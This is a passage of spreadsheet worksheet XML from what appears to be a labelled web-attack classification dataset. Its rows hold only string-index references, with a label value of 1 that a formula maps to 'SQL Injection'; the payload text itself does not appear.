      <c r="C12582" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12583" s="1" t="s">
        <v>13126</v>
      </c>
      <c r="B12583">
        <v>1</v>
      </c>
      <c r="C12583" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12584" s="1" t="s">
        <v>19628</v>
      </c>
      <c r="B12584">
        <v>1</v>
      </c>
      <c r="C12584" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12585" s="1" t="s">
        <v>19044</v>
      </c>
      <c r="B12585">
        <v>1</v>
      </c>
      <c r="C12585" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12586" s="1" t="s">
        <v>17821</v>
      </c>
      <c r="B12586">
        <v>1</v>
      </c>
      <c r="C12586" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12587" s="1" t="s">
        <v>15396</v>
      </c>
      <c r="B12587">
        <v>1</v>
      </c>
      <c r="C12587" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12588" s="1" t="s">
        <v>18232</v>
      </c>
      <c r="B12588">
        <v>1</v>
      </c>
      <c r="C12588" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12589" s="1" t="s">
        <v>19343</v>
      </c>
      <c r="B12589">
        <v>1</v>
      </c>
      <c r="C12589" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12590" s="1" t="s">
        <v>15527</v>
      </c>
      <c r="B12590">
        <v>1</v>
      </c>
      <c r="C12590" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12591" s="1" t="s">
        <v>13647</v>
      </c>
      <c r="B12591">
        <v>1</v>
      </c>
      <c r="C12591" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12592" s="1" t="s">
        <v>18153</v>
      </c>
      <c r="B12592">
        <v>1</v>
      </c>
      <c r="C12592" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12593" s="1" t="s">
        <v>14912</v>
      </c>
      <c r="B12593">
        <v>1</v>
      </c>
      <c r="C12593" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12594" s="1" t="s">
        <v>19509</v>
      </c>
      <c r="B12594">
        <v>1</v>
      </c>
      <c r="C12594" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12595" s="1" t="s">
        <v>16436</v>
      </c>
      <c r="B12595">
        <v>1</v>
      </c>
      <c r="C12595" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12596" s="1" t="s">
        <v>19500</v>
      </c>
      <c r="B12596">
        <v>1</v>
      </c>
      <c r="C12596" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12597" s="1" t="s">
        <v>13442</v>
      </c>
      <c r="B12597">
        <v>1</v>
      </c>
      <c r="C12597" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12598" s="1" t="s">
        <v>18930</v>
      </c>
      <c r="B12598">
        <v>1</v>
      </c>
      <c r="C12598" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12599" s="1" t="s">
        <v>20023</v>
      </c>
      <c r="B12599">
        <v>1</v>
      </c>
      <c r="C12599" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12600" s="1" t="s">
        <v>26419</v>
      </c>
      <c r="B12600">
        <v>1</v>
      </c>
      <c r="C12600" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12601" s="1" t="s">
        <v>14228</v>
      </c>
      <c r="B12601">
        <v>1</v>
      </c>
      <c r="C12601" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12602" s="1" t="s">
        <v>19221</v>
      </c>
      <c r="B12602">
        <v>1</v>
      </c>
      <c r="C12602" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12603" s="1" t="s">
        <v>15239</v>
      </c>
      <c r="B12603">
        <v>1</v>
      </c>
      <c r="C12603" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12604" s="1" t="s">
        <v>18016</v>
      </c>
      <c r="B12604">
        <v>1</v>
      </c>
      <c r="C12604" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12605" s="1" t="s">
        <v>25827</v>
      </c>
      <c r="B12605">
        <v>1</v>
      </c>
      <c r="C12605" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12606" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A12606" s="1" t="s">
        <v>16752</v>
      </c>
      <c r="B12606">
        <v>1</v>
      </c>
      <c r="C12606" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12607" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A12607" s="1" t="s">
        <v>14019</v>
      </c>
      <c r="B12607">
        <v>1</v>
      </c>
      <c r="C12607" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12608" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A12608" s="1" t="s">
        <v>25954</v>
      </c>
      <c r="B12608">
        <v>1</v>
      </c>
      <c r="C12608" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12609" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A12609" s="1" t="s">
        <v>17945</v>
      </c>
      <c r="B12609">
        <v>1</v>
      </c>
      <c r="C12609" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12610" s="1" t="s">
        <v>26674</v>
      </c>
      <c r="B12610">
        <v>1</v>
      </c>
      <c r="C12610" s="7" t="str">
        <f t="shared" si="196"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12611" s="1" t="s">
        <v>25912</v>
      </c>
      <c r="B12611">
        <v>1</v>
      </c>
      <c r="C12611" s="7" t="str">
        <f t="shared" ref="C12611:C12674" si="197">IF(B12611=0,"No Attack", IF(B12611=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12612" s="1" t="s">
        <v>16227</v>
      </c>
      <c r="B12612">
        <v>1</v>
      </c>
      <c r="C12612" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12613" s="1" t="s">
        <v>25416</v>
      </c>
      <c r="B12613">
        <v>1</v>
      </c>
      <c r="C12613" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12614" s="1" t="s">
        <v>15113</v>
      </c>
      <c r="B12614">
        <v>1</v>
      </c>
      <c r="C12614" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12615" s="1" t="s">
        <v>15934</v>
      </c>
      <c r="B12615">
        <v>1</v>
      </c>
      <c r="C12615" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12616" s="1" t="s">
        <v>13768</v>
      </c>
      <c r="B12616">
        <v>1</v>
      </c>
      <c r="C12616" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12617" s="1" t="s">
        <v>19495</v>
      </c>
      <c r="B12617">
        <v>1</v>
      </c>
      <c r="C12617" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12618" s="1" t="s">
        <v>13157</v>
      </c>
      <c r="B12618">
        <v>1</v>
      </c>
      <c r="C12618" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12619" s="1" t="s">
        <v>14866</v>
      </c>
      <c r="B12619">
        <v>1</v>
      </c>
      <c r="C12619" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12620" s="1" t="s">
        <v>26465</v>
      </c>
      <c r="B12620">
        <v>1</v>
      </c>
      <c r="C12620" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12621" s="1" t="s">
        <v>16460</v>
      </c>
      <c r="B12621">
        <v>1</v>
      </c>
      <c r="C12621" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12622" s="1" t="s">
        <v>13467</v>
      </c>
      <c r="B12622">
        <v>1</v>
      </c>
      <c r="C12622" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12623" s="1" t="s">
        <v>18995</v>
      </c>
      <c r="B12623">
        <v>1</v>
      </c>
      <c r="C12623" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12624" s="1" t="s">
        <v>17414</v>
      </c>
      <c r="B12624">
        <v>1</v>
      </c>
      <c r="C12624" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12625" s="1" t="s">
        <v>26728</v>
      </c>
      <c r="B12625">
        <v>1</v>
      </c>
      <c r="C12625" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12626" s="1" t="s">
        <v>26393</v>
      </c>
      <c r="B12626">
        <v>1</v>
      </c>
      <c r="C12626" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12627" s="1" t="s">
        <v>26160</v>
      </c>
      <c r="B12627">
        <v>1</v>
      </c>
      <c r="C12627" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12628" s="1" t="s">
        <v>19963</v>
      </c>
      <c r="B12628">
        <v>1</v>
      </c>
      <c r="C12628" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12629" s="1" t="s">
        <v>13351</v>
      </c>
      <c r="B12629">
        <v>1</v>
      </c>
      <c r="C12629" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12630" s="1" t="s">
        <v>25663</v>
      </c>
      <c r="B12630">
        <v>1</v>
      </c>
      <c r="C12630" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12631" s="1" t="s">
        <v>15654</v>
      </c>
      <c r="B12631">
        <v>1</v>
      </c>
      <c r="C12631" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12632" s="1" t="s">
        <v>16162</v>
      </c>
      <c r="B12632">
        <v>1</v>
      </c>
      <c r="C12632" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12633" s="1" t="s">
        <v>16929</v>
      </c>
      <c r="B12633">
        <v>1</v>
      </c>
      <c r="C12633" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12634" s="1" t="s">
        <v>25860</v>
      </c>
      <c r="B12634">
        <v>1</v>
      </c>
      <c r="C12634" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12635" s="1" t="s">
        <v>19272</v>
      </c>
      <c r="B12635">
        <v>1</v>
      </c>
      <c r="C12635" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12636" s="1" t="s">
        <v>16299</v>
      </c>
      <c r="B12636">
        <v>1</v>
      </c>
      <c r="C12636" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12637" s="1" t="s">
        <v>24520</v>
      </c>
      <c r="B12637">
        <v>1</v>
      </c>
      <c r="C12637" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12638" s="1" t="s">
        <v>16270</v>
      </c>
      <c r="B12638">
        <v>1</v>
      </c>
      <c r="C12638" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12639" s="1" t="s">
        <v>17704</v>
      </c>
      <c r="B12639">
        <v>1</v>
      </c>
      <c r="C12639" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12640" s="1" t="s">
        <v>14112</v>
      </c>
      <c r="B12640">
        <v>1</v>
      </c>
      <c r="C12640" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12641" s="1" t="s">
        <v>14015</v>
      </c>
      <c r="B12641">
        <v>1</v>
      </c>
      <c r="C12641" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12642" s="1" t="s">
        <v>26750</v>
      </c>
      <c r="B12642">
        <v>1</v>
      </c>
      <c r="C12642" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12643" s="1" t="s">
        <v>13870</v>
      </c>
      <c r="B12643">
        <v>1</v>
      </c>
      <c r="C12643" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12644" s="1" t="s">
        <v>26057</v>
      </c>
      <c r="B12644">
        <v>1</v>
      </c>
      <c r="C12644" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12645" s="1" t="s">
        <v>18041</v>
      </c>
      <c r="B12645">
        <v>1</v>
      </c>
      <c r="C12645" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12646" s="1" t="s">
        <v>24757</v>
      </c>
      <c r="B12646">
        <v>1</v>
      </c>
      <c r="C12646" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12647" s="1" t="s">
        <v>15940</v>
      </c>
      <c r="B12647">
        <v>1</v>
      </c>
      <c r="C12647" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12648" s="1" t="s">
        <v>25369</v>
      </c>
      <c r="B12648">
        <v>1</v>
      </c>
      <c r="C12648" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12649" s="1" t="s">
        <v>18404</v>
      </c>
      <c r="B12649">
        <v>1</v>
      </c>
      <c r="C12649" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12650" s="1" t="s">
        <v>26542</v>
      </c>
      <c r="B12650">
        <v>1</v>
      </c>
      <c r="C12650" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12651" s="1" t="s">
        <v>13118</v>
      </c>
      <c r="B12651">
        <v>1</v>
      </c>
      <c r="C12651" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12652" s="1" t="s">
        <v>24402</v>
      </c>
      <c r="B12652">
        <v>1</v>
      </c>
      <c r="C12652" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12653" s="1" t="s">
        <v>18199</v>
      </c>
      <c r="B12653">
        <v>1</v>
      </c>
      <c r="C12653" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12654" s="1" t="s">
        <v>24436</v>
      </c>
      <c r="B12654">
        <v>1</v>
      </c>
      <c r="C12654" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12655" s="1" t="s">
        <v>14129</v>
      </c>
      <c r="B12655">
        <v>1</v>
      </c>
      <c r="C12655" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12656" s="1" t="s">
        <v>12106</v>
      </c>
      <c r="B12656">
        <v>1</v>
      </c>
      <c r="C12656" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12657" s="1" t="s">
        <v>12131</v>
      </c>
      <c r="B12657">
        <v>1</v>
      </c>
      <c r="C12657" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12658" s="1" t="s">
        <v>25391</v>
      </c>
      <c r="B12658">
        <v>1</v>
      </c>
      <c r="C12658" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12659" s="1" t="s">
        <v>12053</v>
      </c>
      <c r="B12659">
        <v>1</v>
      </c>
      <c r="C12659" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12660" s="1" t="s">
        <v>15348</v>
      </c>
      <c r="B12660">
        <v>1</v>
      </c>
      <c r="C12660" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12661" s="1" t="s">
        <v>25038</v>
      </c>
      <c r="B12661">
        <v>1</v>
      </c>
      <c r="C12661" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12662" s="1" t="s">
        <v>24783</v>
      </c>
      <c r="B12662">
        <v>1</v>
      </c>
      <c r="C12662" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12663" s="1" t="s">
        <v>15745</v>
      </c>
      <c r="B12663">
        <v>1</v>
      </c>
      <c r="C12663" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12664" s="1" t="s">
        <v>12522</v>
      </c>
      <c r="B12664">
        <v>1</v>
      </c>
      <c r="C12664" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12665" s="1" t="s">
        <v>17974</v>
      </c>
      <c r="B12665">
        <v>1</v>
      </c>
      <c r="C12665" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12666" s="1" t="s">
        <v>25771</v>
      </c>
      <c r="B12666">
        <v>1</v>
      </c>
      <c r="C12666" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12667" s="1" t="s">
        <v>16843</v>
      </c>
      <c r="B12667">
        <v>1</v>
      </c>
      <c r="C12667" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12668" s="1" t="s">
        <v>24598</v>
      </c>
      <c r="B12668">
        <v>1</v>
      </c>
      <c r="C12668" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12669" s="1" t="s">
        <v>12057</v>
      </c>
      <c r="B12669">
        <v>1</v>
      </c>
      <c r="C12669" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12670" s="1" t="s">
        <v>19386</v>
      </c>
      <c r="B12670">
        <v>1</v>
      </c>
      <c r="C12670" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12671" s="1" t="s">
        <v>25304</v>
      </c>
      <c r="B12671">
        <v>1</v>
      </c>
      <c r="C12671" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12672" s="1" t="s">
        <v>25894</v>
      </c>
      <c r="B12672">
        <v>1</v>
      </c>
      <c r="C12672" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12673" s="1" t="s">
        <v>18847</v>
      </c>
      <c r="B12673">
        <v>1</v>
      </c>
      <c r="C12673" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12674" s="1" t="s">
        <v>19528</v>
      </c>
      <c r="B12674">
        <v>1</v>
      </c>
      <c r="C12674" s="7" t="str">
        <f t="shared" si="197"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12675" s="1" t="s">
        <v>13238</v>
      </c>
      <c r="B12675">
        <v>1</v>
      </c>
      <c r="C12675" s="7" t="str">
        <f t="shared" ref="C12675:C12738" si="198">IF(B12675=0,"No Attack", IF(B12675=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12676" s="1" t="s">
        <v>17842</v>
      </c>
      <c r="B12676">
        <v>1</v>
      </c>
      <c r="C12676" s="7" t="str">
        <f t="shared" si="198"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12677" s="1" t="s">
        <v>24472</v>
      </c>
      <c r="B12677">
        <v>1</v>
      </c>
      <c r="C12677" s="7" t="str">
        <f t="shared" si="198"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12678" s="1" t="s">
        <v>19511</v>
      </c>
      <c r="B12678">
        <v>1</v>
      </c>
      <c r="C12678" s="7" t="str">
        <f t="shared" si="198"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12679" s="1" t="s">
        <v>15948</v>
      </c>
      <c r="B12679">
        <v>1</v>
      </c>
      <c r="C12679" s="7" t="str">
        <f t="shared" si="198"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12680" s="1" t="s">
        <v>18339</v>
      </c>
      <c r="B12680">
        <v>1</v>
      </c>
      <c r="C12680" s="7" t="str">
        <f t="shared" si="198"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12681" s="1" t="s">
        <v>16314</v>
      </c>
      <c r="B12681">
        <v>1</v>
      </c>
      <c r="C12681" s="7" t="str">
        <f t="shared" si="198"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12682" s="1" t="s">
        <v>12199</v>
      </c>
      <c r="B12682">
        <v>1</v>
      </c>
      <c r="C12682" s="7" t="str">
        <f t="shared" si="198"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12683" s="1" t="s">
        <v>24732</v>
      </c>
      <c r="B12683">
        <v>1</v>
      </c>
      <c r="C12683" s="7" t="str">
        <f t="shared" si="198"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="12684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12684" s="1" t="s">
        <v>13414</v>
      </c>
      <c r="B12684">
        <v>1</v>
      </c>
      <c r="C12684" s="7" t="str">
        <f t="shared" si="198"/>
        <v>SQL Injection</v>
      </c>
    </row>
